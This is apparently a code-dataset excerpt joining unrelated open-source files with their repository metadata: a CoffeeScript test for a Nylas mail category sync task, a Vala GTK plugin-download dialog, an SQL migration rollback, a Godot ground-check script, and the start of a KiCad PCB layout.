Task/Loops-Nested/TUSCRIPT/loops-nested.tu
[ "Info-ZIP" ]
{NylasAPI, NylasAPIRequest, Category, AccountStore, DatabaseStore, SyncbackCategoryTask, DatabaseWriter} = require "nylas-exports" xdescribe "SyncbackCategoryTask", -> describe "performRemote", -> pathOf = (fn) -> fn.calls[0].args[0].path accountIdOf = (fn) -> fn.calls[0].args[0].accountId nameOf = (fn) -> fn.calls[0].args[0].body.display_name makeAccount = ({usesFolders, usesLabels} = {}) -> spyOn(AccountStore, "accountForId").andReturn { usesFolders: -> usesFolders usesLabels: -> usesLabels } makeTask = -> category = new Category displayName: "important emails" accountId: "account 123" clientId: "local-444" new SyncbackCategoryTask category: category beforeEach -> spyOn(NylasAPIRequest.prototype, "run").andCallFake -> Promise.resolve(id: "server-444") spyOn(DatabaseWriter.prototype, "persistModel") it "sends API req to /labels if the account uses labels", -> makeAccount(usesLabels: true) task = makeTask() task.performRemote({}) expect(pathOf(NylasAPIRequest.prototype.run)).toBe "/labels" it "sends API req to /folders if the account uses folders", -> makeAccount(usesFolders: true) task = makeTask() task.performRemote({}) expect(pathOf(NylasAPIRequest.prototype.run)).toBe "/folders" it "sends the account id", -> makeAccount() task = makeTask() task.performRemote({}) expect(accountIdOf(NylasAPIRequest.prototype.run)).toBe "account 123" it "sends the display name in the body", -> makeAccount() task = makeTask() task.performRemote({}) expect(nameOf(NylasAPIRequest.prototype.run)).toBe "important emails" it "adds server id to the category, then saves the category", -> makeAccount() waitsForPromise -> task = makeTask() task.performRemote({}) .then -> expect(DatabaseWriter.prototype.persistModel).toHaveBeenCalled() model = DatabaseWriter.prototype.persistModel.calls[0].args[0] expect(model.clientId).toBe "local-444" expect(model.serverId).toBe "server-444"
CoffeeScript
4
cnheider/nylas-mail
packages/client-app/spec/tasks/syncback-category-task-spec.coffee
[ "MIT" ]
/* * Copyright 2018-2019 Jiří Janoušek <[email protected]> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #if HAVE_CEF namespace Nuvola { public class CefPluginDownloaderDialog : Gtk.Dialog { public bool is_downloading {get; private set; default = false;} private CefPluginDownloader downloader; private Gtk.CheckButton? eula; private Gtk.Widget download_button; private Gtk.Grid grid; private Cancellable? cancellable = null; private SourceFunc? resume = null; private bool result = false; private Gtk.Label? error_label = null; private Gtk.Label? progress_text = null; private Gtk.Spinner progress; private Gtk.ScrolledWindow view; public CefPluginDownloaderDialog( CefPluginDownloader downloader, string title, Gtk.Label label, string eula_label, string action_label ) { this.downloader = downloader; this.title = title; set_default_size(400, -1); grid = new Gtk.Grid(); grid.margin = 10; grid.vexpand = true; grid.valign = Gtk.Align.FILL; grid.orientation = Gtk.Orientation.VERTICAL; grid.add(label); eula = new Gtk.CheckButton.with_label(eula_label); eula.margin_top = 10; grid.add(eula); var box = (Gtk.Box) get_content_area(); view = new Gtk.ScrolledWindow(null, null); view.hscrollbar_policy = Gtk.PolicyType.NEVER; view.add(grid); box.pack_start(view, true, true, 0); add_button("Cancel", Gtk.ResponseType.CLOSE); download_button = add_button(action_label, Gtk.ResponseType.APPLY); eula.bind_property("active", download_button, "sensitive", BindingFlags.SYNC_CREATE); progress = new Gtk.Spinner(); progress.margin = 10; progress.vexpand = false; progress.valign = Gtk.Align.END; progress.hexpand = false; grid.add(progress); progress_text = new Gtk.Label(""); grid.add(progress_text); view.show_all(); downloader.progress_text.connect(on_progress_text); } ~CefPluginDownloaderDialog() { downloader.progress_text.disconnect(on_progress_text); } public async bool wait_for_result() { present(); resume = wait_for_result.callback; yield; return result; } protected override void show() { base.show(); Idle.add(() => { int minimum_height; int natural_height; grid.get_preferred_height(out minimum_height, out natural_height); view.set_size_request(-1, natural_height); return false; }); } public virtual signal void cancelled() { if (resume != null) { result = false; resume(); } } public virtual signal void installed() { if (resume != null) { result = true; resume(); } } public virtual signal void failed(GLib.Error reason) { if (resume != null) { warning("%s installation failed: %s", downloader.get_type().name(), reason.message); progress_text.label = ""; result = false; progress.hide(); error_label = Drtgtk.Labels.markup("<b>Error occurred:</b> %s", reason.message); error_label.width_chars = 50; error_label.vexpand = false; error_label.valign = Gtk.Align.START; grid.add(error_label); error_label.margin_top = 20; error_label.show(); download_button.sensitive = true; ((Gtk.Button) download_button).label = "Retry"; } } protected override void response(int response_id) { if (response_id == Gtk.ResponseType.APPLY) { is_downloading = true; if (eula != null) { grid.remove(eula); eula = null; } if (error_label != null) { grid.remove(error_label); error_label = null; } download_button.sensitive = false; progress.start(); progress.set_size_request(50, 50); progress.show(); progress_text.label = ""; get_content_area().queue_resize(); cancellable = new Cancellable(); downloader.download.begin(cancellable, on_download_finished); } else { warning("%s: installation cancelled.", downloader.get_type().name()); if (cancellable != null) { cancellable.cancel(); } else { cancelled(); } } } private void on_download_finished(GLib.Object? o, AsyncResult res) { progress.stop(); is_downloading = false; cancellable = null; try { downloader.download.end(res); installed(); } catch (GLib.Error e) { if (e is GLib.IOError.CANCELLED) { cancelled(); } else { failed(e); } } } private void on_progress_text(string text) { progress_text.label = text; } } } // namespace Nuvola #endif
Vala
5
xcffl/nuvolaruntime
src/nuvolakit-runner/cef/CefPluginDownloaderDialog.vala
[ "BSD-2-Clause" ]
DROP TABLE "public"."t3";
SQL
0
gh-oss-contributor/graphql-engine-1
cli/commands/testdata/config-v2-test-project/migrations/1620138161039_create_table_public_t3/down.sql
[ "Apache-2.0", "MIT" ]
extends RigidBody onready var _forward = - transform.basis.z onready var _collision_shape = $CollisionShape onready var _material = $CollisionShape/MeshInstance.get_surface_material(0) var _dir = 1.0 var _distance = 10.0 var _walk_spd = 100.0 var _acceleration = 22.0 var _gravity_impulse = 30.0 var _is_on_floor = false func _process(_delta): if _is_on_floor: _material.albedo_color = Color.white else: _material.albedo_color = Color.red func _integrate_forces(state): var delta = state.step var velocity = (_forward * _dir * _walk_spd * delta) + (state.linear_velocity * Vector3.UP) state.linear_velocity = state.linear_velocity.move_toward(velocity, _acceleration * delta) if state.transform.origin.z < -_distance: _dir = -1 if state.transform.origin.z > _distance: _dir = 1 ground_check() func ground_check(): var space_state = get_world().direct_space_state var shape = PhysicsShapeQueryParameters.new() shape.transform = _collision_shape.global_transform shape.shape_rid = _collision_shape.shape.get_rid() shape.collision_mask = 2 var result = space_state.get_rest_info(shape) if result: _is_on_floor = true else: _is_on_floor = false
GDScript
4
jonbonazza/godot-demo-projects
3d/physics_tests/utils/rigidbody_ground_check.gd
[ "MIT" ]
(kicad_pcb (version 20171130) (host pcbnew 5.1.4-e60b266~84~ubuntu19.04.1) (general (thickness 1.6) (drawings 97) (tracks 0) (zones 0) (modules 9) (nets 1) ) (page A4) (layers (0 F.Cu signal hide) (31 B.Cu signal) (32 B.Adhes user hide) (33 F.Adhes user hide) (34 B.Paste user) (35 F.Paste user hide) (36 B.SilkS user) (37 F.SilkS user hide) (38 B.Mask user) (39 F.Mask user hide) (40 Dwgs.User user hide) (41 Cmts.User user hide) (42 Eco1.User user hide) (43 Eco2.User user hide) (44 Edge.Cuts user) (45 Margin user hide) (46 B.CrtYd user) (47 F.CrtYd user hide) (48 B.Fab user) (49 F.Fab user hide) ) (setup (last_trace_width 0.25) (trace_clearance 0.2) (zone_clearance 0.508) (zone_45_only no) (trace_min 0.2) (via_size 0.6) (via_drill 0.4) (via_min_size 0.4) (via_min_drill 0.3) (uvia_size 0.3) (uvia_drill 0.1) (uvias_allowed no) (uvia_min_size 0.2) (uvia_min_drill 0.1) (edge_width 0.15) (segment_width 0.2) (pcb_text_width 0.3) (pcb_text_size 1.5 1.5) (mod_edge_width 0.15) (mod_text_size 1 1) (mod_text_width 0.15) (pad_size 4 4) (pad_drill 2.2) (pad_to_mask_clearance 0.2) (aux_axis_origin 0 0) (visible_elements FFFFFF7F) (pcbplotparams (layerselection 0x010f0_ffffffff) (usegerberextensions false) (usegerberattributes false) (usegerberadvancedattributes false) (creategerberjobfile false) (excludeedgelayer true) (linewidth 0.100000) (plotframeref false) (viasonmask false) (mode 1) (useauxorigin false) (hpglpennumber 1) (hpglpenspeed 20) (hpglpendiameter 15.000000) (psnegative false) (psa4output false) (plotreference true) (plotvalue true) (plotinvisibletext false) (padsonsilk false) (subtractmaskfromsilk false) (outputformat 1) (mirror false) (drillshape 0) (scaleselection 1) (outputdirectory "gerbers/")) ) (net 0 "") (net_class Default "This is the default net class." (clearance 0.2) (trace_width 0.25) (via_dia 0.6) (via_drill 0.4) (uvia_dia 0.3) (uvia_drill 0.1) ) (module logos:josef_adamcik_20mm_cu_mask (layer B.Cu) (tedit 0) (tstamp 5DA5298F) (at 117.2 113.95 180) (fp_text reference Ref** (at 0 0) (layer B.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15)) (justify mirror)) ) (fp_text value Val** (at 0 0) (layer B.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15)) (justify mirror)) ) (fp_poly (pts (xy -3.862494 1.725083) (xy -3.8735 -0.232833) (xy -4.3815 -0.232833) (xy -4.394787 -0.0716) (xy -4.408074 0.089634) (xy -4.569772 -0.056451) (xy -4.771611 -0.18615) (xy -5.023829 -0.265937) (xy -5.305757 -0.291945) (xy -5.59672 -0.260305) (xy -5.625135 -0.253912) (xy -5.831315 -0.172643) (xy -5.990986 -0.034111) (xy -6.107517 0.167076) (xy -6.184274 0.436311) (xy -6.218636 0.696236) (xy -6.238589 1.141321) (xy -6.219345 1.529005) (xy -6.181505 1.742998) (xy -5.6515 1.742998) (xy -5.6515 0.458336) (xy -5.52801 0.352115) (xy -5.459988 0.299706) (xy -5.391202 0.269373) (xy -5.297991 0.256557) (xy -5.156692 0.256698) (xy -5.052707 0.26053) (xy -4.874248 0.270556) (xy -4.756906 0.287007) (xy -4.677131 0.31651) (xy -4.611374 0.36569) (xy -4.58353 0.392546) (xy -4.537228 0.441112) (xy -4.505055 0.48876) (xy -4.48444 0.551105) (xy -4.47281 0.643765) (xy -4.467594 0.782357) (xy -4.466218 0.982498) (xy -4.466167 1.105102) (xy -4.466167 1.700279) (xy -4.604418 1.823806) (xy -4.681221 1.886363) (xy -4.755007 1.923302) (xy -4.851358 1.94129) (xy -4.995854 1.946996) (xy -5.078307 1.947333) (xy -5.255009 1.944135) (xy -5.371887 1.930833) (xy -5.453663 1.901871) (xy -5.525057 1.85169) (xy -5.532723 1.845166) (xy -5.6515 1.742998) (xy -6.181505 1.742998) (xy -6.161778 1.854555) (xy -6.066762 2.113234) (xy -5.935169 2.300306) (xy -5.920203 2.314732) (xy -5.757693 2.414737) (xy -5.545247 2.47391) (xy -5.304817 2.493603) (xy -5.058357 2.475167) (xy -4.827819 2.419955) (xy -4.635156 2.329319) (xy -4.520025 2.228513) (xy -4.494224 2.200431) (xy -4.475305 2.19624) (xy -4.462183 2.225922) (xy -4.453774 2.299459) (xy -4.448992 2.426832) (xy -4.446755 2.618023) (xy -4.445977 2.883013) (xy -4.445941 2.910417) (xy -4.445 3.683) (xy -3.851488 3.683) (xy -3.862494 1.725083)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -1.913923 2.471118) (xy -1.691464 2.461551) (xy -1.506046 2.447556) (xy -1.377455 2.429413) (xy -1.3462 2.420999) (xy -1.172616 2.321498) (xy -1.023562 2.167655) (xy -0.923776 1.987669) (xy -0.903558 1.916489) (xy -0.894327 1.828917) (xy -0.885975 1.671007) (xy -0.878924 1.457086) (xy -0.873593 1.20148) (xy -0.870401 0.918517) (xy -0.86972 0.762) (xy -0.867833 -0.232833) (xy -1.375833 -0.232833) (xy -1.418167 0.092491) (xy -1.524 -0.02271) (xy -1.638358 -0.120723) (xy -1.765996 -0.195916) (xy -1.767332 -0.196488) (xy -1.905476 -0.234986) (xy -2.095514 -0.262614) (xy -2.30512 -0.2772) (xy -2.50197 -0.276572) (xy -2.653739 -0.258558) (xy -2.661801 -0.2566) (xy -2.877787 -0.167169) (xy -3.03346 -0.022583) (xy -3.130906 0.18036) (xy -3.172212 0.444859) (xy -3.174005 0.529167) (xy -3.170776 0.567339) (xy -2.624667 0.567339) (xy -2.614368 0.419248) (xy -2.574898 0.318178) (xy -2.493394 0.255626) (xy -2.356997 0.223088) (xy -2.152843 0.21206) (xy -2.086749 0.211667) (xy -1.910063 0.213961) (xy -1.793539 0.224882) (xy -1.712714 0.250493) (xy -1.643122 0.296854) (xy -1.602824 0.331555) (xy -1.520911 0.417993) (xy -1.475745 0.512204) (xy -1.45265 0.648464) (xy -1.448747 0.691389) (xy -1.428849 0.931333) (xy -1.949341 0.931333) (xy -2.202537 0.928505) (xy -2.38326 0.915665) (xy -2.50363 0.88628) (xy -2.57577 0.833816) (xy -2.611801 0.75174) (xy -2.623844 0.633519) (xy -2.624667 0.567339) (xy -3.170776 0.567339) (xy -3.14958 0.817867) (xy -3.077454 1.03836) (xy -2.956523 1.19313) (xy -2.848273 1.26101) (xy -2.765667 1.290841) (xy -2.661786 1.311339) (xy -2.520878 1.323894) (xy -2.327191 1.329898) (xy -2.064971 1.330743) (xy -2.059226 1.330718) (xy -1.430286 1.327936) (xy -1.448187 1.575417) (xy -1.460279 1.709882) (xy -1.481938 1.809548) (xy -1.524571 1.879627) (xy -1.599583 1.925325) (xy -1.71838 1.951855) (xy -1.892368 1.964424) (xy -2.132953 1.968242) (xy -2.308825 1.9685) (xy -3.005715 1.9685) (xy -3.005691 2.189944) (xy -3.001932 2.320848) (xy -2.983152 2.391728) (xy -2.93804 2.427142) (xy -2.88925 2.442774) (xy -2.778405 2.459531) (xy -2.605663 2.470465) (xy -2.39081 2.475855) (xy -2.153634 2.475979) (xy -1.913923 2.471118)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 5.863167 2.485319) (xy 6.082275 2.470525) (xy 6.230628 2.452409) (xy 6.322019 2.423158) (xy 6.370238 2.374958) (xy 6.389078 2.299996) (xy 6.392332 2.19046) (xy 6.392333 2.185549) (xy 6.392333 1.967156) (xy 5.933189 1.982871) (xy 5.708261 1.98749) (xy 5.548827 1.982165) (xy 5.436116 1.965224) (xy 5.351361 1.934995) (xy 5.341777 1.930189) (xy 5.250717 1.874785) (xy 5.185829 1.808109) (xy 5.142817 1.71567) (xy 5.117384 1.582977) (xy 5.105232 1.395542) (xy 5.102066 1.138874) (xy 5.102067 1.121833) (xy 5.108755 0.815574) (xy 5.134551 0.584003) (xy 5.188589 0.417735) (xy 5.280002 0.307382) (xy 5.417922 0.243557) (xy 5.611482 0.216873) (xy 5.869816 0.217942) (xy 5.976459 0.223093) (xy 6.392333 0.246009) (xy 6.392333 0.0217) (xy 6.383364 -0.1282) (xy 6.354231 -0.208197) (xy 6.328856 -0.226966) (xy 6.238999 -0.244981) (xy 6.087607 -0.259204) (xy 5.897748 -0.269079) (xy 5.692493 -0.274048) (xy 5.494909 -0.273554) (xy 5.328068 -0.267038) (xy 5.215038 -0.253944) (xy 5.2148 -0.253893) (xy 4.957651 -0.164456) (xy 4.763611 -0.018615) (xy 4.640705 0.165527) (xy 4.606732 0.247145) (xy 4.582489 0.332345) (xy 4.566376 0.437005) (xy 4.556797 0.577004) (xy 4.552152 0.768223) (xy 4.550842 1.026541) (xy 4.550833 1.058333) (xy 4.552469 1.336669) (xy 4.558274 1.546131) (xy 4.569597 1.702465) (xy 4.587786 1.821416) (xy 4.614187 1.918732) (xy 4.627664 1.955944) (xy 4.739771 2.163003) (xy 4.899376 2.317477) (xy 5.112543 2.421965) (xy 5.385332 2.479063) (xy 5.723808 2.491369) (xy 5.863167 2.485319)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -7.348135 1.62019) (xy -7.216225 1.250899) (xy -7.092798 0.905305) (xy -6.980835 0.591758) (xy -6.883316 0.318606) (xy -6.803221 0.094197) (xy -6.74353 -0.073119) (xy -6.707224 -0.174996) (xy -6.69727 -0.203044) (xy -6.706404 -0.231638) (xy -6.767668 -0.246107) (xy -6.893837 -0.248323) (xy -6.986323 -0.245378) (xy -7.294542 -0.232833) (xy -7.45289 0.1905) (xy -7.611239 0.613833) (xy -9.163431 0.613833) (xy -9.467059 -0.232833) (xy -10.074929 -0.257701) (xy -9.927357 0.1569) (xy -9.877186 0.29745) (xy -9.802997 0.504732) (xy -9.70943 0.76581) (xy -9.601125 1.067748) (xy -9.558918 1.185333) (xy -8.971926 1.185333) (xy -7.793089 1.185333) (xy -7.850518 1.344083) (xy -7.886741 1.444427) (xy -7.944022 1.603343) (xy -8.014758 1.799736) (xy -8.091351 2.012511) (xy -8.098364 2.032) (xy -8.174157 2.241449) (xy -8.244128 2.432674) (xy -8.301008 2.585954) (xy -8.33753 2.681568) (xy -8.340174 2.688167) (xy -8.391566 2.815167) (xy -8.467174 2.6035) (xy -8.508866 2.486611) (xy -8.571462 2.310899) (xy -8.647502 2.097317) (xy -8.729525 1.866815) (xy -8.757355 1.788583) (xy -8.971926 1.185333) (xy -9.558918 1.185333) (xy -9.482722 1.397608) (xy -9.358861 1.742454) (xy -9.277625 1.9685) (xy -8.775466 3.3655) (xy -8.37765 3.377024) (xy -7.979833 3.388547) (xy -7.348135 1.62019)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 1.51609 2.491298) (xy 1.737204 2.435831) (xy 1.923376 2.335862) (xy 2.056224 2.192311) (xy 2.063995 2.178977) (xy 2.095455 2.148212) (xy 2.144081 2.163679) (xy 2.227584 2.232733) (xy 2.255 2.258302) (xy 2.460762 2.395462) (xy 2.720241 2.473769) (xy 3.023917 2.490671) (xy 3.101828 2.485352) (xy 3.325941 2.443653) (xy 3.493052 2.357252) (xy 3.624508 2.21354) (xy 3.661833 2.154575) (xy 3.687449 2.105554) (xy 3.707581 2.048577) (xy 3.723054 1.972935) (xy 3.734693 1.86792) (xy 3.743322 1.722825) (xy 3.749767 1.526941) (xy 3.754853 1.26956) (xy 3.759404 0.939975) (xy 3.760155 0.878417) (xy 3.773811 -0.254) (xy 3.224049 -0.254) (xy 3.210108 0.765795) (xy 3.205552 1.08523) (xy 3.200984 1.33076) (xy 3.195292 1.513143) (xy 3.187362 1.643134) (xy 3.176083 1.73149) (xy 3.16034 1.788965) (xy 3.13902 1.826317) (xy 3.111013 1.8543) (xy 3.096227 1.866462) (xy 2.986952 1.915752) (xy 2.827407 1.943654) (xy 2.649652 1.948525) (xy 2.485748 1.928726) (xy 2.402127 1.901988) (xy 2.334894 1.866974) (xy 2.282667 1.823643) (xy 2.243368 1.761462) (xy 2.214917 1.669894) (xy 2.195236 1.538405) (xy 2.182244 1.356458) (xy 2.173864 1.113519) (xy 2.168017 0.799053) (xy 2.166722 0.709083) (xy 2.153277 -0.254) (xy 1.608667 -0.254) (xy 1.605576 0.560917) (xy 1.602006 0.938177) (xy 1.59385 1.239234) (xy 1.580187 1.472472) (xy 1.560092 1.646276) (xy 1.532642 1.769031) (xy 1.496914 1.849119) (xy 1.459205 1.890015) (xy 1.366191 1.924013) (xy 1.211076 1.943759) (xy 1.094936 1.947333) (xy 0.928913 1.942334) (xy 0.818592 1.92252) (xy 0.735352 1.880673) (xy 0.690277 1.845249) (xy 0.5715 1.743164) (xy 0.550333 0.755165) (xy 0.529167 -0.232833) (xy 0.243417 -0.245351) (xy -0.042333 -0.257868) (xy -0.042333 2.455333) (xy 0.508 2.455333) (xy 0.508 2.103679) (xy 0.649862 2.24975) (xy 0.826921 2.38149) (xy 1.042567 2.465048) (xy 1.278418 2.501344) (xy 1.51609 2.491298)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 7.62 -0.254) (xy 7.069667 -0.254) (xy 7.069667 2.455333) (xy 7.62 2.455333) (xy 7.62 -0.254)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 9.026903 2.529417) (xy 9.038167 1.375833) (xy 9.174028 1.362696) (xy 9.227047 1.361476) (xy 9.27663 1.375184) (xy 9.332552 1.41305) (xy 9.40459 1.484306) (xy 9.502519 1.598181) (xy 9.636115 1.763907) (xy 9.745528 1.902305) (xy 10.181167 2.455051) (xy 10.491728 2.455192) (xy 10.80229 2.455333) (xy 10.577949 2.169583) (xy 10.441557 1.996348) (xy 10.282388 1.794907) (xy 10.130463 1.603244) (xy 10.101129 1.566333) (xy 9.987534 1.423211) (xy 9.891703 1.30197) (xy 9.827446 1.220105) (xy 9.810839 1.198564) (xy 9.820533 1.145903) (xy 9.883741 1.032238) (xy 10.001015 0.856723) (xy 10.172903 0.618512) (xy 10.284014 0.469633) (xy 10.439419 0.262162) (xy 10.575791 0.078058) (xy 10.685464 -0.072164) (xy 10.760775 -0.177989) (xy 10.794059 -0.228898) (xy 10.795 -0.231515) (xy 10.75618 -0.242415) (xy 10.653749 -0.250375) (xy 10.508753 -0.253861) (xy 10.488083 -0.253906) (xy 10.181167 -0.253811) (xy 9.757833 0.296333) (xy 9.60012 0.500246) (xy 9.483433 0.646353) (xy 9.397593 0.744274) (xy 9.332423 0.803631) (xy 9.277743 0.834047) (xy 9.223376 0.845142) (xy 9.17575 0.846573) (xy 9.017 0.846667) (xy 9.017 -0.254) (xy 8.466667 -0.254) (xy 8.466667 3.683) (xy 9.015639 3.683) (xy 9.026903 2.529417)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 6.148354 3.677914) (xy 6.215076 3.66507) (xy 6.223 3.657839) (xy 6.199707 3.615135) (xy 6.136806 3.519678) (xy 6.04476 3.38699) (xy 5.966116 3.276839) (xy 5.709232 2.921) (xy 5.426366 2.922356) (xy 5.1435 2.923713) (xy 4.878414 3.292773) (xy 4.613327 3.661833) (xy 4.805292 3.674776) (xy 4.906284 3.677902) (xy 4.981216 3.66245) (xy 5.053123 3.615789) (xy 5.145038 3.525287) (xy 5.213872 3.450706) (xy 5.430487 3.213695) (xy 5.63963 3.448348) (xy 5.752209 3.570114) (xy 5.834477 3.640473) (xy 5.909964 3.673358) (xy 6.002201 3.682704) (xy 6.035886 3.683) (xy 6.148354 3.677914)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 8.104469 3.58775) (xy 8.040014 3.514969) (xy 7.934837 3.401354) (xy 7.807341 3.266676) (xy 7.749793 3.20675) (xy 7.618331 3.072837) (xy 7.525074 2.989011) (xy 7.450346 2.943566) (xy 7.374468 2.9248) (xy 7.277764 2.921007) (xy 7.269387 2.921) (xy 7.144789 2.926894) (xy 7.092979 2.946852) (xy 7.095614 2.973917) (xy 7.132615 3.030099) (xy 7.206154 3.136837) (xy 7.303539 3.275806) (xy 7.359525 3.354917) (xy 7.592493 3.683) (xy 8.183455 3.683) (xy 8.104469 3.58775)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -8.382 4.728633) (xy -8.377068 4.474941) (xy -8.362395 4.301066) (xy -8.338169 4.20895) (xy -8.3312 4.199467) (xy -8.24722 4.162502) (xy -8.118261 4.150279) (xy -7.980102 4.162113) (xy -7.868524 4.197317) (xy -7.850341 4.208678) (xy -7.813385 4.245883) (xy -7.788142 4.30443) (xy -7.771624 4.400696) (xy -7.760846 4.551055) (xy -7.753838 4.737845) (xy -7.739509 5.207) (xy -7.524669 5.207) (xy -7.545401 4.47675) (xy -7.554031 4.2319) (xy -7.564897 4.01292) (xy -7.576978 3.8354) (xy -7.589253 3.714932) (xy -7.598197 3.670851) (xy -7.680371 3.572787) (xy -7.831793 3.508206) (xy -8.056321 3.47585) (xy -8.210565 3.471333) (xy -8.38038 3.473261) (xy -8.482397 3.481683) (xy -8.533446 3.50056) (xy -8.550357 3.533852) (xy -8.551333 3.551518) (xy -8.541972 3.592219) (xy -8.502713 3.61811) (xy -8.416799 3.633942) (xy -8.26747 3.644468) (xy -8.214555 3.646996) (xy -8.049825 3.659895) (xy -7.916225 3.680321) (xy -7.837807 3.704342) (xy -7.830215 3.709852) (xy -7.795081 3.779481) (xy -7.76517 3.89556) (xy -7.758572 3.936948) (xy -7.734491 4.116482) (xy -7.835996 4.052944) (xy -7.959202 3.993212) (xy -8.055503 3.961999) (xy -8.191577 3.954671) (xy -8.340559 3.981769) (xy -8.470405 4.034038) (xy -8.549072 4.102225) (xy -8.550614 4.104988) (xy -8.567466 4.17747) (xy -8.581226 4.314686) (xy -8.590441 4.496718) (xy -8.593667 4.696217) (xy -8.593667 5.207) (xy -8.382 5.207) (xy -8.382 4.728633)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -9.918423 5.796404) (xy -9.887169 5.775488) (xy -9.87087 5.720227) (xy -9.864659 5.613929) (xy -9.863667 5.439901) (xy -9.863667 5.073855) (xy -9.752124 5.161594) (xy -9.610159 5.227562) (xy -9.432107 5.248409) (xy -9.254836 5.221978) (xy -9.186333 5.194689) (xy -9.082997 5.096414) (xy -9.013218 4.927037) (xy -8.9798 4.694342) (xy -8.977292 4.614333) (xy -8.989539 4.361806) (xy -9.03402 4.179495) (xy -9.114281 4.057959) (xy -9.209064 3.997118) (xy -9.404651 3.945951) (xy -9.608587 3.962279) (xy -9.630833 3.967448) (xy -9.734623 4.013398) (xy -9.784353 4.049031) (xy -9.840847 4.087849) (xy -9.870981 4.062207) (xy -9.878274 4.044661) (xy -9.936317 3.990846) (xy -9.989338 3.979333) (xy -10.017639 3.982243) (xy -10.038934 3.997992) (xy -10.05422 4.03711) (xy -10.064492 4.11013) (xy -10.070744 4.22758) (xy -10.073971 4.399992) (xy -10.074942 4.593167) (xy -9.863667 4.593167) (xy -9.851368 4.39031) (xy -9.808277 4.257129) (xy -9.725104 4.181407) (xy -9.592558 4.150928) (xy -9.525624 4.148667) (xy -9.360119 4.165082) (xy -9.25677 4.211476) (xy -9.252857 4.215191) (xy -9.213873 4.285011) (xy -9.192624 4.407426) (xy -9.186333 4.593167) (xy -9.194285 4.793107) (xy -9.22532 4.923387) (xy -9.290204 4.998116) (xy -9.399707 5.0314) (xy -9.525624 5.037667) (xy -9.679896 5.021494) (xy -9.781181 4.964833) (xy -9.838768 4.855467) (xy -9.861947 4.681181) (xy -9.863667 4.593167) (xy -10.074942 4.593167) (xy -10.075168 4.637897) (xy -10.075333 4.8895) (xy -10.075333 5.799667) (xy -9.9695 5.799667) (xy -9.918423 5.796404)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 3.298341 6.701738) (xy 3.520519 6.678708) (xy 3.685512 6.636058) (xy 3.806631 6.569994) (xy 3.897187 6.47672) (xy 3.916176 6.449369) (xy 3.969679 6.319083) (xy 4.009001 6.125692) (xy 4.034265 5.887778) (xy 4.045591 5.623927) (xy 4.043102 5.352723) (xy 4.026918 5.092749) (xy 3.997161 4.862592) (xy 3.953951 4.680835) (xy 3.903936 4.574367) (xy 3.768179 4.459091) (xy 3.557864 4.378635) (xy 3.275977 4.333832) (xy 3.005667 4.324186) (xy 2.812218 4.328706) (xy 2.635736 4.338689) (xy 2.503923 4.352341) (xy 2.466977 4.359103) (xy 2.247704 4.448944) (xy 2.086344 4.599836) (xy 2.043464 4.667649) (xy 2.015138 4.731303) (xy 1.994788 4.811874) (xy 1.981184 4.923431) (xy 1.973094 5.080047) (xy 1.969288 5.295794) (xy 1.9685 5.5245) (xy 1.968515 5.52923) (xy 2.455333 5.52923) (xy 2.458154 5.252362) (xy 2.472543 5.049216) (xy 2.507386 4.90889) (xy 2.57157 4.82048) (xy 2.673982 4.773084) (xy 2.82351 4.755801) (xy 3.029039 4.757727) (xy 3.082649 4.759646) (xy 3.276462 4.774545) (xy 3.401031 4.803783) (xy 3.463649 4.842502) (xy 3.496324 4.892253) (xy 3.51939 4.975038) (xy 3.535119 5.105848) (xy 3.545777 5.299674) (xy 3.549469 5.40959) (xy 3.554267 5.687943) (xy 3.547625 5.89448) (xy 3.526183 6.041669) (xy 3.486582 6.141974) (xy 3.425461 6.207861) (xy 3.339462 6.251795) (xy 3.320675 6.258472) (xy 3.141147 6.293155) (xy 2.915851 6.296697) (xy 2.880306 6.294379) (xy 2.726448 6.278404) (xy 2.614976 6.249196) (xy 2.539088 6.194509) (xy 2.491984 6.1021) (xy 2.466863 5.959723) (xy 2.456925 5.755135) (xy 2.455333 5.52923) (xy 1.968515 5.52923) (xy 1.969407 5.792992) (xy 1.973087 5.991368) (xy 1.980977 6.134166) (xy 1.994517 6.235927) (xy 2.015145 6.311189) (xy 2.044298 6.374494) (xy 2.054345 6.392333) (xy 2.141498 6.512883) (xy 2.251311 6.600158) (xy 2.397382 6.658685) (xy 2.593314 6.692991) (xy 2.852706 6.707601) (xy 3.005667 6.708944) (xy 3.298341 6.701738)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 5.734944 6.705715) (xy 5.924259 6.698353) (xy 6.070697 6.68778) (xy 6.148917 6.676174) (xy 